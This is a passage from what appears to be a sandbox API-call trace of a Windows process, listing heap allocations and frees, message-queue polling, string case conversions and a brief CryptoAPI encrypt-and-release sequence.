hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.672] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.673] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.674] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.675] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b13c8*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b13c8*, pdwDataLen=0x8bef68*=0x8) returned 1 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.675] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.675] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.675] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.675] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.675] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.676] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.676] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.676] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.676] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.676] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.676] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.676] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.676] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.676] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.676] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.676] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.676] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.677] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.678] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.678] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.678] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0267.678] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.678] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0267.678] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.678] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.678] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.678] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.678] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.678] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.679] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0267.679] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.679] CryptDestroyKey (hKey=0xaa57a0) returned 1 [0267.679] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.679] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.679] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.679] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.679] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.679] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.679] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.679] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.679] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.679] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.679] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.680] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.680] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.680] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.680] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0267.680] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.681] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.681] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.681] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.682] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.682] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.682] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.682] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.682] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.682] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.682] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.682] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0267.682] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.683] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.683] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.683] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0267.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.683] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0267.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.683] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0267.683] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.683] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0267.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0267.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0267.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0267.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.686] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, 